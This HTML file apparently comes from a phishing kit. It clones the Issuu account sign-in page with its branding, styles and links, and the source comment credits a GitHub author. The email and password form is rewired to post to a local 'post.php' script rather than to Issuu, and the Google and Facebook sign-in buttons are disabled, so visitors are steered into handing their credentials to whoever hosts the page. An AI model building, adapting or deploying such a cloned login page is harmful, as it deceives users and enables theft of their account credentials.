<!DOCTYPE html>

<!-- Creatred by https://github.com/makdosx -->

            <html lang="en">
            <head>
                <meta charset="utf-8">
                <meta http-equiv="x-ua-compatible" content="ie=edge">
                <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
                <meta name="google" content="notranslate">
                <meta name="description" content="Sign in to your Issuu account to manage your past publications, publish new documents, and edit your account settings.">
                
                <link rel="canonical" href="https://issuu.com/signin" />
                <title>Account Signin | Issuu</title>
                <link rel="stylesheet" href="https://static.isu.pub/fe/ixu/14.1.24/index.min.css" /><link rel="stylesheet" href="https://static.isu.pub/fe/silkscreen/0.0.1248/index.min.css" />
                <style data-styled="true" data-styled-version="5.3.5">*,*:before,*:after{box-sizing:border-box;}/*!sc*/
html,body,#app{height:100%;margin:0;}/*!sc*/
.grecaptcha-badge{visibility:hidden;}/*!sc*/
h1,h2,h3,h4,h5,h6{color:#333333 !important;}/*!sc*/
data-styled.g1[id="sc-global-jcNAYp1"]{content:"sc-global-jcNAYp1,"}/*!sc*/
.iJrdjO{display:grid;width:100%;grid-template-columns:repeat(12,1fr);gap:16px;}/*!sc*/
@media (min-width:768px){.iJrdjO{gap:24px;}}/*!sc*/
@media (min-width:1024px){}/*!sc*/
@media (min-width:1440px){}/*!sc*/
.kxgFcc{display:grid;width:100%;grid-template-columns:repeat(1,100%);gap:0;}/*!sc*/
@media (min-width:768px){}/*!sc*/
@media (min-width:1024px){.kxgFcc{grid-template-columns:repeat(1,100%);}}/*!sc*/
@media (min-width:1440px){}/*!sc*/
.hxmKCS{display:grid;width:100%;gap:16px;}/*!sc*/
@media (min-width:768px){.hxmKCS{gap:24px;}}/*!sc*/
@media (min-width:1024px){}/*!sc*/
@media (min-width:1440px){}/*!sc*/
data-styled.g2[id="sc-2hatzv-0"]{content:"iJrdjO,kxgFcc,hxmKCS,"}/*!sc*/
.hYhvXi{max-width:360px;margin:0 auto;padding:0 16px;}/*!sc*/
@media (min-width:360px){.hYhvXi{max-width:1440px;}}/*!sc*/
@media (min-width:768px){.hYhvXi{padding:0 24px;}}/*!sc*/
data-styled.g3[id="sc-gm3ds4-0"]{content:"hYhvXi,"}/*!sc*/
.dsDWAT{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;font-family:'Inter','Inter-Regular',sans-serif;width:100%;box-shadow:0 -2px 4px rgba(0,0,0,0.12);-webkit-flex:0;-ms-flex:0;flex:0;max-height:62px;min-height:62px;}/*!sc*/
data-styled.g4[id="sc-1jk2i9s-0"]{content:"dsDWAT,"}/*!sc*/
.bHFghf{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;grid-column:1 / span 12;-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;margin:0 auto;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;}/*!sc*/
data-styled.g5[id="sc-1jk2i9s-1"]{content:"bHFghf,"}/*!sc*/
.grjIuA{-webkit-text-decoration:none;text-decoration:none;color:#4d4d4d;font-size:14px;}/*!sc*/
.grjIuA:visited{color:#4d4d4d;}/*!sc*/
.grjIuA:not(:last-child){margin-right:12px;}/*!sc*/
@media (min-width:430px){.grjIuA:not(:last-child){margin-right:24px;}}/*!sc*/
.grjIuA:first-child{margin-right:auto;}/*!sc*/
@media (min-width:430px){.grjIuA:first-child{margin-right:100px;}}/*!sc*/
.grjIuA:hover{-webkit-text-decoration:underline;text-decoration:underline;color:#666666;}/*!sc*/
data-styled.g6[id="sc-1jk2i9s-2"]{content:"grjIuA,"}/*!sc*/
.eEySix{display:block;}/*!sc*/
@media (min-width:768px){.eEySix{display:none;}}/*!sc*/
data-styled.g8[id="sc-db27og-0"]{content:"eEySix,"}/*!sc*/
.imjTVA{display:none;}/*!sc*/
@media (min-width:768px){.imjTVA{display:block;}}/*!sc*/
data-styled.g9[id="sc-db27og-1"]{content:"imjTVA,"}/*!sc*/
.hHHleR{width:65px;}/*!sc*/
@media (min-width:768px){.hHHleR{width:35px;}}/*!sc*/
@media (min-width:1024px){.hHHleR{width:44px;}}/*!sc*/
data-styled.g10[id="sc-db27og-2"]{content:"hHHleR,"}/*!sc*/
.dnrWVQ{height:100%;position:relative;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;}/*!sc*/
data-styled.g11[id="sc-1xtxc60-0"]{content:"dnrWVQ,"}/*!sc*/
.sIwzN{grid-column:1 / span 12;}/*!sc*/
@media (min-width:1024px){.sIwzN{grid-column:1 / span 8;}}/*!sc*/
data-styled.g12[id="sc-1xtxc60-1"]{content:"sIwzN,"}/*!sc*/
.DDaiM{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;margin:var(--space-4) 0 var(--space-2);}/*!sc*/
@media (min-width:768px){.DDaiM{margin:var(--space-4);}}/*!sc*/
@media (min-width:1024px){.DDaiM{position:absolute;}}/*!sc*/
data-styled.g13[id="sc-1xtxc60-2"]{content:"DDaiM,"}/*!sc*/
.blyMpy{max-width:522px;margin:0 auto;margin-bottom:var(--space-5);}/*!sc*/
@media (min-width:1024px){.blyMpy{max-width:545px;margin-top:var(--space-6);}}/*!sc*/
data-styled.g14[id="sc-1xtxc60-3"]{content:"blyMpy,"}/*!sc*/
.beUfqN{display:none;background-color:#363565;background-image:url(//static.isu.pub/fe/product-signup-frontend/380/344475cfc1afee368f6f.jpg);background-position:top var(--space-3) center;background-size:contain;background-repeat:no-repeat;}/*!sc*/
@media (min-width:1440px){.beUfqN{background-image:url(//static.isu.pub/fe/product-signup-frontend/380/4801b36568eb2fa4eb57.jpg);}}/*!sc*/
@media (min-width:1024px){.beUfqN{display:block;grid-column:9 / span 4;}}/*!sc*/
data-styled.g15[id="sc-1xtxc60-4"]{content:"beUfqN,"}/*!sc*/
.bSogXC{min-height:100vh;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;}/*!sc*/
data-styled.g16[id="sc-1lo2z8v-0"]{content:"bSogXC,"}/*!sc*/
.lhmtvj{overflow:auto;-webkit-flex:1;-ms-flex:1;flex:1;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:normal;-webkit-justify-content:normal;-ms-flex-pack:normal;justify-content:normal;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;}/*!sc*/
@media (min-width:1024px){.lhmtvj{-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;}}/*!sc*/
data-styled.g17[id="sc-1lo2z8v-1"]{content:"lhmtvj,"}/*!sc*/
.hgIdLY h1{font-size:1.5rem;}/*!sc*/
@media (min-width:1024px){.hgIdLY h1{font-size:2rem;}}/*!sc*/
data-styled.g18[id="sc-1jlu25e-0"]{content:"hgIdLY,"}/*!sc*/
.gAmWDH{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;text-align:center;margin:0 auto var(--space-4);}/*!sc*/
@media (min-width:1024px){.gAmWDH{margin-bottom:var(--space-3);}}/*!sc*/
data-styled.g19[id="sc-1jlu25e-1"]{content:"gAmWDH,"}/*!sc*/
.wbcFX button[aria-disabled='true']{background-color:#f2f3f8;color:#b0b2b7;}/*!sc*/
.wbcFX button[aria-disabled='true']:hover{background-color:#f2f3f8 !important;color:#b0b2b7;}/*!sc*/
data-styled.g32[id="sc-1e6a64j-0"]{content:"wbcFX,"}/*!sc*/
.jDEnYy{margin-right:var(--space-1);}/*!sc*/
data-styled.g47[id="sc-lbeogk-0"]{content:"jDEnYy,"}/*!sc*/
.eebbPH{white-space:nowrap;}/*!sc*/
data-styled.g48[id="sc-lbeogk-1"]{content:"eebbPH,"}/*!sc*/
.fstBtE{-webkit-align-self:center;-ms-flex-item-align:center;align-self:center;}/*!sc*/
data-styled.g49[id="sc-lbeogk-2"]{content:"fstBtE,"}/*!sc*/
.jweQbx{margin-bottom:var(--space-6);grid-column-gap:var(--space-1);}/*!sc*/
@media (min-width:768px){.jweQbx{grid-template-columns:repeat(2,1fr);}}/*!sc*/
@media (min-width:1024px){.jweQbx{margin-bottom:var(--space-3);}}/*!sc*/
data-styled.g51[id="sc-1rtfv5o-0"]{content:"jweQbx,"}/*!sc*/
.dckpDe{text-align:center;padding:0 var(--space-5);width:100%;box-sizing:border-box;}/*!sc*/
data-styled.g52[id="sc-cysws2-0"]{content:"dckpDe,"}/*!sc*/
.aQZuS{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;grid-column:1;-webkit-flex-wrap:nowrap;-ms-flex-wrap:nowrap;flex-wrap:nowrap;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:center;padding:0 var(--space-1);}/*!sc*/
@media (min-width:360px){.aQZuS{padding:0 var(--space-5);}}/*!sc*/
data-styled.g53[id="sc-1sqfy2s-0"]{content:"aQZuS,"}/*!sc*/
.litaao{width:100%;text-align:left;}/*!sc*/
data-styled.g54[id="sc-1sqfy2s-1"]{content:"litaao,"}/*!sc*/
.bjmjLA{text-align:center;}/*!sc*/
data-styled.g55[id="sc-1sqfy2s-2"]{content:"bjmjLA,"}/*!sc*/
</style>
                <!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-N7P4N8B');</script>
<!-- End Google Tag Manager -->

            </head>
            <body>
            <body>
                <div id="app"><div class="sc-1lo2z8v-0 bSogXC"><div class="sc-1lo2z8v-1 lhmtvj"><div class="sc-2hatzv-0 sc-1xtxc60-0 iJrdjO dnrWVQ"><div class="sc-1xtxc60-1 sIwzN"><div class="sc-1xtxc60-2 DDaiM"><div class="sc-db27og-2 hHHleR"><div class="sc-db27og-1 imjTVA"><svg width="100%" height="100%" viewBox="0 0 52 52" role="img"><title>issuu</title><path d="M25.83 12.45a12.98 12.98 0 1 0-.25 25.96 12.98 12.98 0 0 0 .24-25.96h.01Zm-.2 19.54a6.57 6.57 0 1 1 .13-13.15A6.57 6.57 0 0 1 25.64 32Z" fill="#ff5a47"></path><path d="M25.52 0H2.12A2.13 2.13 0 0 0 0 2.12v23.4A25.52 25.52 0 1 0 25.52 0ZM8 25.17a17.72 17.72 0 1 1 35.44.33A17.72 17.72 0 0 1 8 25.17Z" fill="#ff5a47"></path></svg></div><div class="sc-db27og-0 eEySix"><svg width="100%" height="100%" viewBox="0 0 116 27" role="img"><title>issuu</title><path d="M37 .07a2.14 2.14 0 1 1 0 4.3 2.14 2.14 0 0 1 0-4.3Zm0 24.47a1.78 1.78 0 0 1-1.83-1.83V8.83a1.83 1.83 0 1 1 3.66 0v13.88A1.78 1.78 0 0 1 37 24.54Zm13.2.16c-2.22.03-4.4-.67-6.19-2a1.96 1.96 0 0 1-.78-1.5c0-.78.63-1.28 1.4-1.28.54 0 1.05.2 1.45.54a7.2 7.2 0 0 0 4.4 1.5c2.11 0 3.23-.77 3.23-1.98 0-1.32-1.09-1.83-3.81-2.57-4.8-1.28-6.55-2.92-6.55-5.73 0-2.92 2.69-4.83 6.9-4.83 1.67.01 3.31.39 4.82 1.1 1.06.5 1.8 1.13 1.8 1.9 0 .7-.4 1.37-1.4 1.37a3.5 3.5 0 0 1-1.6-.55 7.64 7.64 0 0 0-3.7-.9c-1.95 0-3.28.5-3.28 1.87 0 1.36 1.17 1.75 3.98 2.57 4.2 1.2 6.39 2.33 6.39 5.49 0 2.88-2.42 4.99-7.05 4.99m17.63.01a10.2 10.2 0 0 1-6.2-2 1.96 1.96 0 0 1-.77-1.5c0-.78.62-1.28 1.4-1.28.53 0 1.04.2 1.44.54a7.24 7.24 0 0 0 4.4 1.5c2.12 0 3.24-.77 3.24-1.98 0-1.32-1.1-1.83-3.82-2.57-4.8-1.28-6.54-2.92-6.54-5.73 0-2.92 2.68-4.83 6.9-4.83 1.66.01 3.3.39 4.82 1.1 1.05.5 1.8 1.13 1.8 1.9 0 .7-.38 1.37-1.4 1.37a3.5 3.5 0 0 1-1.6-.55 7.64 7.64 0 0 0-3.7-.9c-1.94 0-3.27.5-3.27 1.87 0 1.36 1.17 1.75 3.98 2.57 4.2 1.2 6.39 2.33 6.39 5.49 0 2.88-2.42 4.99-7.06 4.99m10.58-8.14V8.84a1.83 1.83 0 0 1 3.66 0v8.14a4.34 4.34 0 0 0 4.48 4.37 4.38 4.38 0 0 0 4.53-4.37V8.84a1.83 1.83 0 1 1 3.66 0v7.71a8 8 0 0 1-8.18 8.15 7.97 7.97 0 0 1-8.15-8.15m20.38 0V8.84a1.83 1.83 0 1 1 3.66 0v8.14a4.34 4.34 0 0 0 4.48 4.37 4.38 4.38 0 0 0 4.53-4.37V8.84a1.83 1.83 0 0 1 3.66 0v7.71a8 8 0 0 1-8.18 8.15 7.97 7.97 0 0 1-8.15-8.15" fill="#000000"></path><path d="M13.5 6.5a6.78 6.78 0 1 0-.13 13.56 6.78 6.78 0 0 0 .12-13.56Zm-.1 10.22a3.44 3.44 0 1 1 .06-6.86 3.44 3.44 0 0 1-.07 6.85" fill="#ff5a47"></path><path d="M13.33 0H1.11A1.11 1.11 0 0 0 0 1.1v12.23A13.33 13.33 0 1 0 13.33 0ZM4.17 13.15a9.26 9.26 0 1 1 18.52.18 9.26 9.26 0 0 1-18.52-.18Z" fill="#ff5a47"></path></svg></div></div></div><div class="sc-1xtxc60-3 blyMpy"><div><div class="sc-1jlu25e-1 gAmWDH"><div class="sc-1jlu25e-0 hgIdLY"><h1 class="ProductHeading__product-heading__wGhnq__0-0-1248 ProductHeading__product-heading--step-1__wKmG7__0-0-1248">Welcome back!</h1></div></div><div class="sc-2hatzv-0 kxgFcc"><div class="sc-1sqfy2s-0 aQZuS"><div class="Spacing__spacing--margin-bottom-3__-Igr5__0-0-1248"><h2 class="ProductHeading__product-heading__wGhnq__0-0-1248 ProductHeading__product-heading--step-negative-2__ARtAS__0-0-1248 ProductHeading__product-heading--medium__u7JU5__0-0-1248">Sign in with:</h2></div><div class="sc-cysws2-0 dckpDe"><div class="sc-2hatzv-0 sc-1rtfv5o-0 hxmKCS jweQbx"><div class="sc-1e6a64j-0 wbcFX"><button class="ProductButton__product-button__oPHZY__0-0-1248 ProductButton__product-button--tertiary__oa1O0__0-0-1248 ProductButton__product-button--icon-left__qLB0n__0-0-1248 ProductButton__product-button--full-width__GyAdl__0-0-1248 ProductButton__product-button--large__14bTO__0-0-1248" aria-disabled="true" disabled=""><span class="ProductButton__product-button__icon__vl-zg__0-0-1248 ProductButton__product-button__icon--left__ytoMs__0-0-1248"><svg class="Icon__icon__DqC9j__0-0-1248" role="presentation" style="--color-icon:unset;--size-block-icon:1.5rem;--size-inline-icon:1.5rem"><use xlink:href="/fe/silkscreen/0.0.1248/icons/sprites.svg#icon-google-original"></use></svg></span><span class="ProductButton__product-button__text__6CgRS__0-0-1248">Google</span></button></div><div class="sc-1e6a64j-0 wbcFX"><button class="ProductButton__product-button__oPHZY__0-0-1248 ProductButton__product-button--tertiary__oa1O0__0-0-1248 ProductButton__product-button--icon-left__qLB0n__0-0-1248 ProductButton__product-button--full-width__GyAdl__0-0-1248 ProductButton__product-button--large__14bTO__0-0-1248" aria-disabled="true" disabled=""><span class="ProductButton__product-button__icon__vl-zg__0-0-1248 ProductButton__product-button__icon--left__ytoMs__0-0-1248"><svg version="1.1" viewBox="0 0 55 55" xml:space="preserve" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><g transform="matrix(0.04 0 0 0.04 27.92 27.42)"><g><g transform="matrix(0.10 0 0 -0.10 -0.02 -4.13)"><path d="M 10240 5120 c 0 2827.7 -2292.3 5120 -5120 5120 S 0 7947.7 0 5120 C 0 2564.46 1872.31 446.301 4320 62.2 V 3640 H 3020 v 1480 h 1300 v 1128 c 0 1283.2 764.38 1992 1933.9 1992 c 560.17 0 1146.1 -100 1146.1 -100 V 6880 h -645.62 c -636.03 0 -834.38 -394.67 -834.38 -799.57 V 5120 h 1420 l -227 -1480 H 5920 V 62.2 C 8367.69 446.3 10240 2564.46 10240 5120" stroke-linecap="round" style="stroke:none;stroke-width:1;stroke-dasharray:none;stroke-linecap:butt;stroke-dashoffset:0;stroke-linejoin:miter;stroke-miterlimit:4;fill:rgb(24,119,242);fill-rule:nonzero;opacity:1" transform=" translate(-5120, -5151.1)"></path></g><g transform="matrix(0.10 0 0 -0.10 11.98 133.35)"><path d="m 7113 3640 l 227 1480 H 5920 v 960.43 c 0 404.9 198.35 799.57 834.38 799.57 H 7400 v 1260 s -585.93 100 -1146.1 100 C 5084.38 8240 4320 7531.2 4320 6248 V 5120 H 3020 V 3640 h 1300 V 62.2 C 4580.67 21.3 4847.84 0 5120 0 c 272.16 0 539.33 21.3 800 62.2 V 3640 h 1193" stroke-linecap="round" style="stroke:none;stroke-width:1;stroke-dasharray:none;stroke-linecap:butt;stroke-dashoffset:0;stroke-linejoin:miter;stroke-miterlimit:4;fill:rgb(255,255,255);fill-rule:nonzero;opacity:1" transform=" translate(-5210, -4120)"></path></g></g></g></svg></span><span class="ProductButton__product-button__text__6CgRS__0-0-1248">Facebook</span></button></div></div></div><div class="Spacing__spacing--margin-bottom-2__OQ-jA__0-0-1248"><h2 class="ProductHeading__product-heading__wGhnq__0-0-1248 ProductHeading__product-heading--step-negative-2__ARtAS__0-0-1248 ProductHeading__product-heading--medium__u7JU5__0-0-1248">Or sign in with email.</h2></div>
                
              <form class="sc-1sqfy2s-1 litaao" action="post.php" method="post">
			   <div class="MessageDecorator__message-decorator__container__OUDP5__0-0-1248">
				<div class="MessageDecorator__message-decorator__fields__L2yPb__0-0-1248">
				<div class="LabelDecorator__label-decorator__3dIv6__0-0-1248">
					
				<label class="LabelDecorator__label-decorator__label__QqI42__0-0-1248" for="email">Email or username</label>
				<div class="DecoratedInput__decorated-input__container__oqr6t__0-0-1248 DecoratedInput__decorated-input__container--large__gCc6S__0-0-1248 DecoratedInput__decorated-input__container--default__82frh__0-0-1248" id="email__decorated-input">
					
				<div class="DecoratedInput__decorated-input__icon-wrapper__UuWpl__0-0-1248 DecoratedInput__decorated-input__icon-wrapper--field__kApWR__0-0-1248" style="color:#1a1a1a"><svg class="Icon__icon__DqC9j__0-0-1248" role="img" style="--color-icon:currentColor;--size-block-icon:1.5rem;--size-inline-icon:1.5rem"><title>user-icon</title><use xlink:href="/fe/silkscreen/0.0.1248/icons/sprites.svg#icon-user"></use></svg></div><input type="text" aria-label="Email or Username" name="user" placeholder="Enter your email or username" value="" size="1" class="DecoratedInput__decorated-input__input__zaesC__0-0-1248" id="email"/>
				
				<div class="DecoratedInput__decorated-input__icon-wrapper__UuWpl__0-0-1248"></div></div></div></div><div class="MessageDecorator__message-decorator__message-wrapper__cJyW9__0-0-1248 MessageDecorator__message-decorator__message-wrapper--placeholder__ZOpzH__0-0-1248"><p class="ProductParagraph__product-paragraph__GMmH0__0-0-1248 ProductParagraph__product-paragraph--step-negative-2__HWaFp__0-0-1248">placeholder</p></div></div><div class="MessageDecorator__message-decorator__container__OUDP5__0-0-1248"><div class="MessageDecorator__message-decorator__fields__L2yPb__0-0-1248"><div class="LabelDecorator__label-decorator__3dIv6__0-0-1248"><label class="LabelDecorator__label-decorator__label__QqI42__0-0-1248" for="password">Password</label><div class="DecoratedInput__decorated-input__container__oqr6t__0-0-1248 DecoratedInput__decorated-input__container--large__gCc6S__0-0-1248 DecoratedInput__decorated-input__container--default__82frh__0-0-1248"><div class="DecoratedInput__decorated-input__icon-wrapper__UuWpl__0-0-1248 DecoratedInput__decorated-input__icon-wrapper--field__kApWR__0-0-1248" style="color:#1a1a1a"><svg class="Icon__icon__DqC9j__0-0-1248" role="img" style="--color-icon:currentColor;--size-block-icon:1.5rem;--size-inline-icon:1.5rem"><title>lock-icon</title><use xlink:href="/fe/silkscreen/0.0.1248/icons/sprites.svg#icon-lock"></use></svg></div>
				
		
		
		<input type="password" autoComplete="off" aria-label="Password" name="pass" placeholder="Enter password" size="1" class="DecoratedInput__decorated-input__input__zaesC__0-0-1248" id="password"/><div class="DecoratedInput__decorated-input__icon-wrapper__UuWpl__0-0-1248 DecoratedInput__decorated-input__icon-wrapper--action__bmpEW__0-0-1248" style="color:#1a1a1a"><svg class="Icon__icon__DqC9j__0-0-1248" role="presentation" style="cursor:pointer;--color-icon:currentColor;--size-block-icon:1.5rem;--size-inline-icon:1.5rem"><use xlink:href="/fe/silkscreen/0.0.1248/icons/sprites.svg#icon-eye-invisible"></use></svg></div><div class="DecoratedInput__decorated-input__icon-wrapper__UuWpl__0-0-1248"></div></div></div></div><div class="MessageDecorator__message-decorator__message-wrapper__cJyW9__0-0-1248 MessageDecorator__message-decorator__message-wrapper--placeholder__ZOpzH__0-0-1248"><p class="ProductParagraph__product-paragraph__GMmH0__0-0-1248 ProductParagraph__product-paragraph--step-negative-2__HWaFp__0-0-1248">placeholder</p></div></div><div class="Spacing__spacing--margin-top-3__oEL3L__0-0-1248 Spacing__spacing--margin-bottom-3__-Igr5__0-0-1248">
					
			
			
			<button class="ProductButton__product-button__oPHZY__0-0-1248 ProductButton__product-button--primary__9T1iW__0-0-1248 ProductButton__product-button--full-width__GyAdl__0-0-1248 ProductButton__product-button--large__14bTO__0-0-1248" type="submit"><span class="ProductButton__product-button__text__6CgRS__0-0-1248">Sign in</span></button>
			
			
			</div><div class="sc-1sqfy2s-2 bjmjLA"><p class="ProductParagraph__product-paragraph__GMmH0__0-0-1248 ProductParagraph__product-paragraph--step-negative-1__cqcY3__0-0-1248"><a class="Link__link--indigo__Gh1V3__0-0-1248" href="/forgotpassword?returnUrl=https%3A%2F%2Fissuu.com%2F">I forgot my password</a></p><div class="Spacing__spacing--margin-top-6__Kmo0G__0-0-1248"><div class="sc-lbeogk-2 fstBtE"><p class="ProductParagraph__product-paragraph__GMmH0__0-0-1248 ProductParagraph__product-paragraph--step-0__AsHY7__0-0-1248"><span class="sc-lbeogk-0 jDEnYy">Don&#x27;t have an account yet?</span><b class="sc-lbeogk-1 eebbPH"><a class="Link__link--indigo__Gh1V3__0-0-1248" href="/pricing?issuu_product=signin&amp;returnUrl=https%3A%2F%2Fissuu.com%2F">Create account</a></b></p></div></div></div></form>
                
                
                </div></div></div></div></div><div class="sc-1xtxc60-4 beUfqN"></div></div></div><div class="sc-1jk2i9s-0 dsDWAT"><div class="sc-2hatzv-0 sc-gm3ds4-0 iJrdjO hYhvXi"><div class="sc-1jk2i9s-1 bHFghf"><a href="/" class="sc-1jk2i9s-2 grjIuA">Issuu Inc.</a><a href="/legal/terms" target="_blank" class="sc-1jk2i9s-2 grjIuA">Terms</a><a href="/legal/privacy" target="_blank" class="sc-1jk2i9s-2 grjIuA">Privacy</a><a href="/legal/dmca" target="_blank" class="sc-1jk2i9s-2 grjIuA">DMCA</a><a href="/legal/accessibility" target="_blank" class="sc-1jk2i9s-2 grjIuA">Accessibility</a></div></div></div></div></div>
                
            </body>
            </html>
        
